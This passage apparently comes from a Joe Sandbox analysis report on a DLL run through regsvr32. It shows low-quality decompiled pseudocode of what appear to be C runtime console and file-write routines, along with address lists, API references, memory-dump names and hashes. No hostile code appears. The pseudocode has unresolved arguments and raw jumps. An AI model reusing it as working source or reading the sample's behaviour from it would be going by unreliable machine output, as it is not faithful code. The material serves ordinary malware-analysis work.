				 *(_t339 + 0x3d + _t370 * 8) = _t211 & 0x000000fb;
				r8d = 2;
				goto 0x8000d899;
				r9d =  *_t327 & 0x000000ff;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t354 + 0x18)))) + _t345 * 2)) >= 0) goto 0x8000d893;
				_t368 =  &(_t327[1]);
				if (_t368 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000d9e0;
				r8d = 2;
				if (E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t327, _t324, _t327, _t331, _t339, _t354) == 0xffffffff) goto 0x8000da03;
				_t328 = _t368;
				goto 0x8000d8ae;
				_t199 = E0000000118000B5FC(_t211 & 0x000000fb, __ebp, _t278, _t331 - 0x6d, _t328, _t324, _t328, _t331, _t359, _t354);
				if (_t199 == 0xffffffff) goto 0x8000da03;
				_t329 =  &(_t328[1]);
				 *((long long*)(_t333 + 0x38)) = _t324;
				 *((long long*)(_t333 + 0x30)) = _t324;
				 *((intOrPtr*)(_t333 + 0x28)) = 5;
				_t272 = _t331 + 0xf;
				 *((long long*)(_t333 + 0x20)) = _t272;
				r9d = r12d;
				_t341 = _t331 - 0x6d;
				E0000000118000A154();
				r14d = _t199;
				if (_t199 == 0) goto 0x8000da03;
				 *((long long*)(_t333 + 0x20)) = _t324;
				r8d = _t199;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				 *((intOrPtr*)(_t278 + 4)) = __esi -  *((intOrPtr*)(_t331 - 0x41)) +  *((intOrPtr*)(_t278 + 8));
				if ( *((intOrPtr*)(_t331 - 0x69)) - r14d < 0) goto 0x8000da03;
				if ( *((char*)(_t331 - 0x71)) != 0xa) goto 0x8000d966;
				 *((short*)(_t331 - 0x71)) = 0xd;
				 *((long long*)(_t333 + 0x20)) = _t324;
				_t130 = _t272 - 0xc; // 0x1
				r8d = _t130;
				_t321 = _t331 - 0x71;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000d9fb;
				if ( *((intOrPtr*)(_t331 - 0x69)) - 1 < 0) goto 0x8000da03;
				 *((intOrPtr*)(_t278 + 8)) =  *((intOrPtr*)(_t278 + 8)) + 1;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + 1;
				if (_t329 -  *((intOrPtr*)(_t331 - 0x61)) >= 0) goto 0x8000da03;
				goto 0x8000d681;
				if (_t321 <= 0) goto 0x8000d9a9;
				_t330 = _t329 - _t368;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + _t368 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t330 + _t368));
				if (1 - _t321 < 0) goto 0x8000d988;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) +  *((intOrPtr*)(_t278 + 4));
				goto 0x8000da03;
				if (_t341 <= 0) goto 0x8000d9da;
				_t322 = _t324;
				 *((char*)( *((intOrPtr*)(0x180000000 + 0x227f0 +  *(_t331 - 0x39) * 8)) + _t322 + 0x3e + _t370 * 8)) =  *((intOrPtr*)(_t322 + _t330));
				_t323 = _t322 + 1;
				if (2 - _t341 < 0) goto 0x8000d9ba;
				 *((intOrPtr*)(_t278 + 4)) =  *((intOrPtr*)(_t278 + 4)) + r8d;
				goto 0x8000da03;
				 *((intOrPtr*)(_t341 + 0x3e + _t370 * 8)) = r9b;
				 *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) =  *( *((intOrPtr*)(0x180000000 + 0x227f0 + _t364 * 8)) + 0x3d + _t370 * 8) | 0x00000004;
				_t173 = _t323 + 1; // 0x1
				 *((intOrPtr*)(_t278 + 4)) = _t173;
				goto 0x8000da03;
				 *_t278 = GetLastError();
				return E000000011800010B0(_t206,  *((intOrPtr*)(_t331 - 0x45)),  *(_t331 + 0x17) ^ _t333);
			}

















































                                                                                            0x18000d5b8
                                                                                            0x18000d5c6
                                                                                            0x18000d5ca
                                                                                            0x18000d5d1
                                                                                            0x18000d5d9
                                                                                            0x18000d5dd
                                                                                            0x18000d5e7
                                                                                            0x18000d5ee
                                                                                            0x18000d5f5
                                                                                            0x18000d5fc
                                                                                            0x18000d606
                                                                                            0x18000d60a
                                                                                            0x18000d618
                                                                                            0x18000d624
                                                                                            0x18000d629
                                                                                            0x18000d62d
                                                                                            0x18000d630
                                                                                            0x18000d633
                                                                                            0x18000d63d
                                                                                            0x18000d64a
                                                                                            0x18000d64f
                                                                                            0x18000d65c
                                                                                            0x18000d65f
                                                                                            0x18000d664
                                                                                            0x18000d667
                                                                                            0x18000d66e
                                                                                            0x18000d677
                                                                                            0x18000d67b
                                                                                            0x18000d683
                                                                                            0x18000d686
                                                                                            0x18000d689
                                                                                            0x18000d69c
                                                                                            0x18000d6af
                                                                                            0x18000d6ba
                                                                                            0x18000d6be
                                                                                            0x18000d6c8
                                                                                            0x18000d6cd
                                                                                            0x18000d6e1
                                                                                            0x18000d6ea
                                                                                            0x18000d6f0
                                                                                            0x18000d6f2
                                                                                            0x18000d6fc
                                                                                            0x18000d702
                                                                                            0x18000d708
                                                                                            0x18000d71d
                                                                                            0x18000d72a
                                                                                            0x18000d72f
                                                                                            0x18000d73b
                                                                                            0x18000d740
                                                                                            0x18000d74b
                                                                                            0x18000d759
                                                                                            0x18000d764
                                                                                            0x18000d766
                                                                                            0x18000d76a
                                                                                            0x18000d76e
                                                                                            0x18000d77b
                                                                                            0x18000d77d
                                                                                            0x18000d780
                                                                                            0x18000d783
                                                                                            0x18000d794
                                                                                            0x18000d79d
                                                                                            0x18000d7ab
                                                                                            0x18000d7ae
                                                                                            0x18000d7b6
                                                                                            0x18000d7bf
                                                                                            0x18000d7ca
                                                                                            0x18000d7d0
                                                                                            0x18000d7d6
                                                                                            0x18000d7da
                                                                                            0x18000d7e6
                                                                                            0x18000d7e8
                                                                                            0x18000d7eb
                                                                                            0x18000d7ee
                                                                                            0x18000d7f3
                                                                                            0x18000d7ff
                                                                                            0x18000d808
                                                                                            0x18000d80e
                                                                                            0x18000d811
                                                                                            0x18000d814
                                                                                            0x18000d818
                                                                                            0x18000d81d
                                                                                            0x18000d825
                                                                                            0x18000d82d
                                                                                            0x18000d834
                                                                                            0x18000d839
                                                                                            0x18000d83f
                                                                                            0x18000d844
                                                                                            0x18000d84e
                                                                                            0x18000d850
                                                                                            0x18000d860
                                                                                            0x18000d862
                                                                                            0x18000d86a
                                                                                            0x18000d873
                                                                                            0x18000d888
                                                                                            0x18000d88e
                                                                                            0x18000d891
                                                                                            0x18000d8a0
                                                                                            0x18000d8a8
                                                                                            0x18000d8ae
                                                                                            0x18000d8b1
                                                                                            0x18000d8b6
                                                                                            0x18000d8bb
                                                                                            0x18000d8c3
                                                                                            0x18000d8c7
                                                                                            0x18000d8cc
                                                                                            0x18000d8cf
                                                                                            0x18000d8d8
                                                                                            0x18000d8dd
                                                                                            0x18000d8e2
                                                                                            0x18000d8e8
                                                                                            0x18000d8f1
                                                                                            0x18000d907
                                                                                            0x18000d915
                                                                                            0x18000d91c
                                                                                            0x18000d926
                                                                                            0x18000d92d
                                                                                            0x18000d931
                                                                                            0x18000d93a
                                                                                            0x18000d93a
                                                                                            0x18000d93e
                                                                                            0x18000d94d
                                                                                            0x18000d957
                                                                                            0x18000d95d
                                                                                            0x18000d960
                                                                                            0x18000d96a
                                                                                            0x18000d97b
                                                                                            0x18000d983
                                                                                            0x18000d985
                                                                                            0x18000d997
                                                                                            0x18000d9a7
                                                                                            0x18000d9a9
                                                                                            0x18000d9ac
                                                                                            0x18000d9b1
                                                                                            0x18000d9b3
                                                                                            0x18000d9c8
                                                                                            0x18000d9cf
                                                                                            0x18000d9d8
                                                                                            0x18000d9da
                                                                                            0x18000d9de
                                                                                            0x18000d9e0
                                                                                            0x18000d9ed
                                                                                            0x18000d9f3
                                                                                            0x18000d9f6
                                                                                            0x18000d9f9
                                                                                            0x18000da01
                                                                                            0x18000da2c

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                            • String ID:
                                                                                            • API String ID: 2718003287-0
                                                                                            • Opcode ID: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                            • Instruction ID: d53985ea959d49848d9070d6669198272c686acab0006873b77d48ca537a322a
                                                                                            • Opcode Fuzzy Hash: 6feae5b9fbf0fd58da801fa267745876ae53b7eaab871f0ae10c7fb0fe539764
                                                                                            • Instruction Fuzzy Hash: 1CD1E332B18A8889E752CFA9D4403EC3BB1F3597D8F148216EE5D97B99DE34C60AC750
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000DEE0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 28%
                                                                                            			E0000000118000DEE0(void* __ebx, signed int __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
				signed long long _v88;
				void* _v96;
				void* _v108;
				signed int _v112;
				intOrPtr _v120;
				signed int _v124;
				long _v128;
				signed int _v136;
				long long _v144;
				signed int _v152;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed short _t99;
				void* _t107;
				long _t116;
				signed int _t117;
				void* _t122;
				signed short _t127;
				signed int _t130;
				signed short _t133;
				signed short _t159;
				signed short _t167;
				signed long long _t180;
				signed int _t184;
				signed short* _t197;
				signed int _t204;
				signed int _t205;
				signed short* _t206;
				void* _t208;
				signed long long _t220;
				void* _t221;
				signed long long _t222;
				signed long long _t223;
				void* _t224;
				signed short* _t226;

				_t197 = __rdx;
				_t122 = __ebx;
				r14d = r8d;
				_t184 = __r9;
				_t206 = __rdx;
				if (r8d == 0) goto 0x8000e1d3;
				if (__rdx != 0) goto 0x8000df47;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v144 = __r9;
				_v152 = _t205;
				E000000011800084EC(__rax, __r9, __rcx, __rdx, __rdx, _t208, __r8);
				goto 0x8000e1d5;
				_t220 = __ecx >> 6;
				_v88 = _t220;
				_t223 = __ecx + __ecx * 8;
				_t99 =  *((intOrPtr*)(0x800227f0 + 0x39 + _t223 * 8));
				_v136 = _t99;
				if (_t99 - 1 - 1 > 0) goto 0x8000df7e;
				if (( !r14d & 0x00000001) == 0) goto 0x8000df10;
				if (( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) & 0x00000020) == 0) goto 0x8000df94;
				_t23 = _t197 + 2; // 0x2
				r8d = _t23;
				E0000000118000E958(r15d);
				_v112 = _t205;
				if (E0000000118000E2E0(r15d, __ecx) == 0) goto 0x8000e0c3;
				if ( *( *((intOrPtr*)(0x800227f0 + _t220 * 8)) + 0x38 + _t223 * 8) - dil >= 0) goto 0x8000e0c3;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x8000dfd3;
				0x80006f60();
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t205) goto 0x8000dfef;
				_t180 =  *((intOrPtr*)(0x800227f0 + _t220 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t223 * 8)) == dil) goto 0x8000e0c3;
				if (GetConsoleMode(??, ??) == 0) goto 0x8000e0bc;
				_t127 = _v136;
				_t159 = _t127;
				if (_t159 == 0) goto 0x8000e099;
				if (_t159 == 0) goto 0x8000e024;
				if (_t127 - 1 != 1) goto 0x8000e15d;
				_t221 = _t206 + _t224;
				_v128 = _t205;
				_t226 = _t206;
				if (_t206 - _t221 >= 0) goto 0x8000e090;
				r14d = _v124;
				_v136 =  *_t226 & 0x0000ffff;
				_t107 = E0000000118000E960( *_t226 & 0xffff);
				_t130 = _v136 & 0x0000ffff;
				if (_t107 != _t130) goto 0x8000e087;
				r14d = r14d + 2;
				_v124 = r14d;
				if (_t130 != 0xa) goto 0x8000e07c;
				if (E0000000118000E960(0xd) != 0xd) goto 0x8000e087;
				r14d = r14d + 1;
				_v124 = r14d;
				if ( &(_t226[1]) - _t221 >= 0) goto 0x8000e090;
				goto 0x8000e038;
				_v128 = GetLastError();
				_t222 = _v88;
				goto 0x8000e153;
				r9d = r14d;
				_v152 = __r9;
				E0000000118000D5B8(_t109, r15d, __esi, __ebp, __r9,  &_v128, _t206);
				asm("movsd xmm0, [eax]");
				goto 0x8000e158;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x800227f0 + _t222 * 8)) + 0x38 + _t223 * 8)) - dil >= 0) goto 0x8000e120;
				_t133 = _v136;
				_t167 = _t133;
				if (_t167 == 0) goto 0x8000e10c;
				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}







































                                                                                            0x18000dee0
                                                                                            0x18000dee0
                                                                                            0x18000def6
                                                                                            0x18000defc
                                                                                            0x18000deff
                                                                                            0x18000df05
                                                                                            0x18000df0e
                                                                                            0x18000df10
                                                                                            0x18000df15
                                                                                            0x18000df18
                                                                                            0x18000df1e
                                                                                            0x18000df25
                                                                                            0x18000df2d
                                                                                            0x18000df30
                                                                                            0x18000df35
                                                                                            0x18000df3a
                                                                                            0x18000df42
                                                                                            0x18000df57
                                                                                            0x18000df5b
                                                                                            0x18000df5f
                                                                                            0x18000df67
                                                                                            0x18000df6c
                                                                                            0x18000df73
                                                                                            0x18000df7c
                                                                                            0x18000df84
                                                                                            0x18000df8b
                                                                                            0x18000df8b
                                                                                            0x18000df8f
                                                                                            0x18000df97
                                                                                            0x18000dfa9
                                                                                            0x18000dfb8
                                                                                            0x18000dfc2
                                                                                            0x18000dfc7
                                                                                            0x18000dfde
                                                                                            0x18000dfe0
                                                                                            0x18000dfe9
                                                                                            0x18000e004
                                                                                            0x18000e00a
                                                                                            0x18000e00e
                                                                                            0x18000e010
                                                                                            0x18000e019
                                                                                            0x18000e01e
                                                                                            0x18000e024
                                                                                            0x18000e028
                                                                                            0x18000e02c
                                                                                            0x18000e032
                                                                                            0x18000e034
                                                                                            0x18000e03f
                                                                                            0x18000e043
                                                                                            0x18000e048
                                                                                            0x18000e04f
                                                                                            0x18000e051
                                                                                            0x18000e055
                                                                                            0x18000e05d
                                                                                            0x18000e071
                                                                                            0x18000e073
                                                                                            0x18000e076
                                                                                            0x18000e083
                                                                                            0x18000e085
                                                                                            0x18000e08d
                                                                                            0x18000e090
                                                                                            0x18000e094
                                                                                            0x18000e099
                                                                                            0x18000e09c
                                                                                            0x18000e0ab
                                                                                            0x18000e0b0
                                                                                            0x18000e0b7
                                                                                            0x18000e0cc
                                                                                            0x18000e0ce
                                                                                            0x18000e0d2
                                                                                            0x18000e0d4
                                                                                            0x18000e0d9
                                                                                            0x18000e0de
                                                                                            0x18000e0e4
                                                                                            0x18000e0f1
                                                                                            0x18000e0f6
                                                                                            0x18000e0f8
                                                                                            0x18000e105
                                                                                            0x18000e10a
                                                                                            0x18000e10c
                                                                                            0x18000e119
                                                                                            0x18000e11e
                                                                                            0x18000e12b
                                                                                            0x18000e12e
                                                                                            0x18000e136
                                                                                            0x18000e13a
                                                                                            0x18000e145
                                                                                            0x18000e147
                                                                                            0x18000e14d
                                                                                            0x18000e153
                                                                                            0x18000e158
                                                                                            0x18000e16e
                                                                                            0x18000e170
                                                                                            0x18000e175
                                                                                            0x18000e17a
                                                                                            0x18000e17c
                                                                                            0x18000e180
                                                                                            0x18000e187
                                                                                            0x18000e18b
                                                                                            0x18000e18e
                                                                                            0x18000e196
                                                                                            0x18000e199
                                                                                            0x18000e19e
                                                                                            0x18000e1ad
                                                                                            0x18000e1b2
                                                                                            0x18000e1b4
                                                                                            0x18000e1b8
                                                                                            0x18000e1bc
                                                                                            0x18000e1c3
                                                                                            0x18000e1c7
                                                                                            0x18000e1d1
                                                                                            0x18000e1e5

                                                                                            APIs
                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConsoleErrorLastMode
                                                                                            • String ID:
                                                                                            • API String ID: 953036326-0
                                                                                            • Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                            • Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
                                                                                            • Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
                                                                                            • Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 29%
                                                                                            			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0x5e1a320b5ccd
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}














                                                                                            0x18000dc50
                                                                                            0x18000dc55
                                                                                            0x18000dc67
                                                                                            0x18000dc6f
                                                                                            0x18000dc79
                                                                                            0x18000dc8a
                                                                                            0x18000dc98
                                                                                            0x18000dc9c
                                                                                            0x18000dcb4
                                                                                            0x18000dcba
                                                                                            0x18000dcbd
                                                                                            0x18000dcc3
                                                                                            0x18000dccb
                                                                                            0x18000dccd
                                                                                            0x18000dcd8
                                                                                            0x18000dcdf
                                                                                            0x18000dce2
                                                                                            0x18000dce6
                                                                                            0x18000dcf8
                                                                                            0x18000dcfa
                                                                                            0x18000dd05
                                                                                            0x18000dd13
                                                                                            0x18000dd26
                                                                                            0x18000dd2b
                                                                                            0x18000dd35
                                                                                            0x18000dd3e
                                                                                            0x18000dd44
                                                                                            0x18000dd46
                                                                                            0x18000dd5b
                                                                                            0x18000dd64
                                                                                            0x18000dd6f
                                                                                            0x18000dd77
                                                                                            0x18000dd7e
                                                                                            0x18000dd84
                                                                                            0x18000dd8f
                                                                                            0x18000ddbf

                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastWrite
                                                                                            • String ID: U
                                                                                            • API String ID: 442123175-4171548499
                                                                                            • Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                            • Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
                                                                                            • Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
                                                                                            • Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                            • String ID: csm
                                                                                            • API String ID: 2573137834-1018135373
                                                                                            • Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                            • Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
                                                                                            • Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
                                                                                            • Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.1503065831.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.1503047740.0000000180000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503280957.0000000180016000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503336725.0000000180021000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.1503366391.0000000180023000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassCursorLoadRegister
                                                                                            • String ID: P
                                                                                            • API String ID: 1693014935-3110715001
                                                                                            • Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                            • Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
                                                                                            • Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
                                                                                            • Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%